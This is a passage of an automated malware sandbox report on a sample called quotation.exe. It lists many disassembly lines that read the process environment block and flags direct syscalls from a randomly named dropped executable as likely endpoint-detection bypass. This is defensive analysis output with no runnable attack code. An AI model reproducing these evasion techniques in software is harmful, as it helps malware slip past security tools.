                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E0710 mov eax, dword ptr fs:[00000030h]3_2_012E0710
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8770 mov eax, dword ptr fs:[00000030h]3_2_012B8770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0770 mov eax, dword ptr fs:[00000030h]3_2_012C0770
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov esi, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov eax, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E674D mov eax, dword ptr fs:[00000030h]3_2_012E674D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01334755 mov eax, dword ptr fs:[00000030h]3_2_01334755
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E75D mov eax, dword ptr fs:[00000030h]3_2_0133E75D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0750 mov eax, dword ptr fs:[00000030h]3_2_012B0750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2750 mov eax, dword ptr fs:[00000030h]3_2_012F2750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2750 mov eax, dword ptr fs:[00000030h]3_2_012F2750
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B07AF mov eax, dword ptr fs:[00000030h]3_2_012B07AF
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013647A0 mov eax, dword ptr fs:[00000030h]3_2_013647A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135678E mov eax, dword ptr fs:[00000030h]3_2_0135678E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D27ED mov eax, dword ptr fs:[00000030h]3_2_012D27ED
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B47FB mov eax, dword ptr fs:[00000030h]3_2_012B47FB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B47FB mov eax, dword ptr fs:[00000030h]3_2_012B47FB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E7E1 mov eax, dword ptr fs:[00000030h]3_2_0133E7E1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BC7C0 mov eax, dword ptr fs:[00000030h]3_2_012BC7C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013307C3 mov eax, dword ptr fs:[00000030h]3_2_013307C3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B262C mov eax, dword ptr fs:[00000030h]3_2_012B262C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CE627 mov eax, dword ptr fs:[00000030h]3_2_012CE627
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E6620 mov eax, dword ptr fs:[00000030h]3_2_012E6620
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E8620 mov eax, dword ptr fs:[00000030h]3_2_012E8620
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C260B mov eax, dword ptr fs:[00000030h]3_2_012C260B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F2619 mov eax, dword ptr fs:[00000030h]3_2_012F2619
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E609 mov eax, dword ptr fs:[00000030h]3_2_0132E609
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA660 mov eax, dword ptr fs:[00000030h]3_2_012EA660
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA660 mov eax, dword ptr fs:[00000030h]3_2_012EA660
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137866E mov eax, dword ptr fs:[00000030h]3_2_0137866E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137866E mov eax, dword ptr fs:[00000030h]3_2_0137866E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E2674 mov eax, dword ptr fs:[00000030h]3_2_012E2674
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012CC640 mov eax, dword ptr fs:[00000030h]3_2_012CC640
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC6A6 mov eax, dword ptr fs:[00000030h]3_2_012EC6A6
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E66B0 mov eax, dword ptr fs:[00000030h]3_2_012E66B0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4690 mov eax, dword ptr fs:[00000030h]3_2_012B4690
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4690 mov eax, dword ptr fs:[00000030h]3_2_012B4690
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E6F2 mov eax, dword ptr fs:[00000030h]3_2_0132E6F2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E6F2 mov eax, dword ptr fs:[00000030h]3_2_0132E6F2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E6F2 mov eax, dword ptr fs:[00000030h]3_2_0132E6F2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E6F2 mov eax, dword ptr fs:[00000030h]3_2_0132E6F2
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013306F1 mov eax, dword ptr fs:[00000030h]3_2_013306F1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013306F1 mov eax, dword ptr fs:[00000030h]3_2_013306F1
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA6C7 mov ebx, dword ptr fs:[00000030h]3_2_012EA6C7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA6C7 mov eax, dword ptr fs:[00000030h]3_2_012EA6C7
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133892A mov eax, dword ptr fs:[00000030h]3_2_0133892A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0134892B mov eax, dword ptr fs:[00000030h]3_2_0134892B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C912 mov eax, dword ptr fs:[00000030h]3_2_0133C912
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8918 mov eax, dword ptr fs:[00000030h]3_2_012A8918
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8918 mov eax, dword ptr fs:[00000030h]3_2_012A8918
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E908 mov eax, dword ptr fs:[00000030h]3_2_0132E908
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132E908 mov eax, dword ptr fs:[00000030h]3_2_0132E908
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F096E mov eax, dword ptr fs:[00000030h]3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F096E mov edx, dword ptr fs:[00000030h]3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012F096E mov eax, dword ptr fs:[00000030h]3_2_012F096E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01354978 mov eax, dword ptr fs:[00000030h]3_2_01354978
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01354978 mov eax, dword ptr fs:[00000030h]3_2_01354978
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D6962 mov eax, dword ptr fs:[00000030h]3_2_012D6962
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D6962 mov eax, dword ptr fs:[00000030h]3_2_012D6962
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D6962 mov eax, dword ptr fs:[00000030h]3_2_012D6962
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C97C mov eax, dword ptr fs:[00000030h]3_2_0133C97C
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01330946 mov eax, dword ptr fs:[00000030h]3_2_01330946
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384940 mov eax, dword ptr fs:[00000030h]3_2_01384940
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013389B3 mov esi, dword ptr fs:[00000030h]3_2_013389B3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013389B3 mov eax, dword ptr fs:[00000030h]3_2_013389B3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013389B3 mov eax, dword ptr fs:[00000030h]3_2_013389B3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B09AD mov eax, dword ptr fs:[00000030h]3_2_012B09AD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B09AD mov eax, dword ptr fs:[00000030h]3_2_012B09AD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C29A0 mov eax, dword ptr fs:[00000030h]3_2_012C29A0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E9E0 mov eax, dword ptr fs:[00000030h]3_2_0133E9E0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E29F9 mov eax, dword ptr fs:[00000030h]3_2_012E29F9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E29F9 mov eax, dword ptr fs:[00000030h]3_2_012E29F9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137A9D3 mov eax, dword ptr fs:[00000030h]3_2_0137A9D3
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013469C0 mov eax, dword ptr fs:[00000030h]3_2_013469C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BA9D0 mov eax, dword ptr fs:[00000030h]3_2_012BA9D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E49D0 mov eax, dword ptr fs:[00000030h]3_2_012E49D0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135483A mov eax, dword ptr fs:[00000030h]3_2_0135483A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135483A mov eax, dword ptr fs:[00000030h]3_2_0135483A
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov eax, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov eax, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov eax, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov ecx, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov eax, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D2835 mov eax, dword ptr fs:[00000030h]3_2_012D2835
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EA830 mov eax, dword ptr fs:[00000030h]3_2_012EA830
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C810 mov eax, dword ptr fs:[00000030h]3_2_0133C810
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E872 mov eax, dword ptr fs:[00000030h]3_2_0133E872
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133E872 mov eax, dword ptr fs:[00000030h]3_2_0133E872
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346870 mov eax, dword ptr fs:[00000030h]3_2_01346870
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346870 mov eax, dword ptr fs:[00000030h]3_2_01346870
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C2840 mov ecx, dword ptr fs:[00000030h]3_2_012C2840
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4859 mov eax, dword ptr fs:[00000030h]3_2_012B4859
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B4859 mov eax, dword ptr fs:[00000030h]3_2_012B4859
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012E0854 mov eax, dword ptr fs:[00000030h]3_2_012E0854
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0887 mov eax, dword ptr fs:[00000030h]3_2_012B0887
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133C89D mov eax, dword ptr fs:[00000030h]3_2_0133C89D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137A8E4 mov eax, dword ptr fs:[00000030h]3_2_0137A8E4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC8F9 mov eax, dword ptr fs:[00000030h]3_2_012EC8F9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012EC8F9 mov eax, dword ptr fs:[00000030h]3_2_012EC8F9
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DE8C0 mov eax, dword ptr fs:[00000030h]3_2_012DE8C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_013808C0 mov eax, dword ptr fs:[00000030h]3_2_013808C0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DEB20 mov eax, dword ptr fs:[00000030h]3_2_012DEB20
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DEB20 mov eax, dword ptr fs:[00000030h]3_2_012DEB20
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01378B28 mov eax, dword ptr fs:[00000030h]3_2_01378B28
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01378B28 mov eax, dword ptr fs:[00000030h]3_2_01378B28
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132EB1D mov eax, dword ptr fs:[00000030h]3_2_0132EB1D
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01384B00 mov eax, dword ptr fs:[00000030h]3_2_01384B00
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ACB7E mov eax, dword ptr fs:[00000030h]3_2_012ACB7E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135EB50 mov eax, dword ptr fs:[00000030h]3_2_0135EB50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01382B57 mov eax, dword ptr fs:[00000030h]3_2_01382B57
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01382B57 mov eax, dword ptr fs:[00000030h]3_2_01382B57
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01382B57 mov eax, dword ptr fs:[00000030h]3_2_01382B57
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01382B57 mov eax, dword ptr fs:[00000030h]3_2_01382B57
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346B40 mov eax, dword ptr fs:[00000030h]3_2_01346B40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01346B40 mov eax, dword ptr fs:[00000030h]3_2_01346B40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0137AB40 mov eax, dword ptr fs:[00000030h]3_2_0137AB40
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01358B42 mov eax, dword ptr fs:[00000030h]3_2_01358B42
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012A8B50 mov eax, dword ptr fs:[00000030h]3_2_012A8B50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01364B4B mov eax, dword ptr fs:[00000030h]3_2_01364B4B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01364B4B mov eax, dword ptr fs:[00000030h]3_2_01364B4B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01364BB0 mov eax, dword ptr fs:[00000030h]3_2_01364BB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01364BB0 mov eax, dword ptr fs:[00000030h]3_2_01364BB0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0BBE mov eax, dword ptr fs:[00000030h]3_2_012C0BBE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0BBE mov eax, dword ptr fs:[00000030h]3_2_012C0BBE
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133CBF0 mov eax, dword ptr fs:[00000030h]3_2_0133CBF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DEBFC mov eax, dword ptr fs:[00000030h]3_2_012DEBFC
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8BF0 mov eax, dword ptr fs:[00000030h]3_2_012B8BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8BF0 mov eax, dword ptr fs:[00000030h]3_2_012B8BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8BF0 mov eax, dword ptr fs:[00000030h]3_2_012B8BF0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135EBD0 mov eax, dword ptr fs:[00000030h]3_2_0135EBD0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0BCD mov eax, dword ptr fs:[00000030h]3_2_012B0BCD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0BCD mov eax, dword ptr fs:[00000030h]3_2_012B0BCD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B0BCD mov eax, dword ptr fs:[00000030h]3_2_012B0BCD
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D0BCB mov eax, dword ptr fs:[00000030h]3_2_012D0BCB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D0BCB mov eax, dword ptr fs:[00000030h]3_2_012D0BCB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D0BCB mov eax, dword ptr fs:[00000030h]3_2_012D0BCB
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012DEA2E mov eax, dword ptr fs:[00000030h]3_2_012DEA2E
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ECA24 mov eax, dword ptr fs:[00000030h]3_2_012ECA24
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ECA38 mov eax, dword ptr fs:[00000030h]3_2_012ECA38
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D4A35 mov eax, dword ptr fs:[00000030h]3_2_012D4A35
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012D4A35 mov eax, dword ptr fs:[00000030h]3_2_012D4A35
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0133CA11 mov eax, dword ptr fs:[00000030h]3_2_0133CA11
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132CA72 mov eax, dword ptr fs:[00000030h]3_2_0132CA72
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0132CA72 mov eax, dword ptr fs:[00000030h]3_2_0132CA72
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ECA6F mov eax, dword ptr fs:[00000030h]3_2_012ECA6F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ECA6F mov eax, dword ptr fs:[00000030h]3_2_012ECA6F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012ECA6F mov eax, dword ptr fs:[00000030h]3_2_012ECA6F
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_0135EA60 mov eax, dword ptr fs:[00000030h]3_2_0135EA60
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0A5B mov eax, dword ptr fs:[00000030h]3_2_012C0A5B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012C0A5B mov eax, dword ptr fs:[00000030h]3_2_012C0A5B
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B6A50 mov eax, dword ptr fs:[00000030h]3_2_012B6A50
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8AA0 mov eax, dword ptr fs:[00000030h]3_2_012B8AA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012B8AA0 mov eax, dword ptr fs:[00000030h]3_2_012B8AA0
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_01306AA4 mov eax, dword ptr fs:[00000030h]3_2_01306AA4
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeCode function: 3_2_012BEA80 mov eax, dword ptr fs:[00000030h]3_2_012BEA80
                Source: C:\Users\user\Desktop\quotation.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\FdUqAcKdQkkfReEJmQWGxpxYMarhYDgkPXJXBHqNIKHVAWXe\gkTgnrvdOG.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
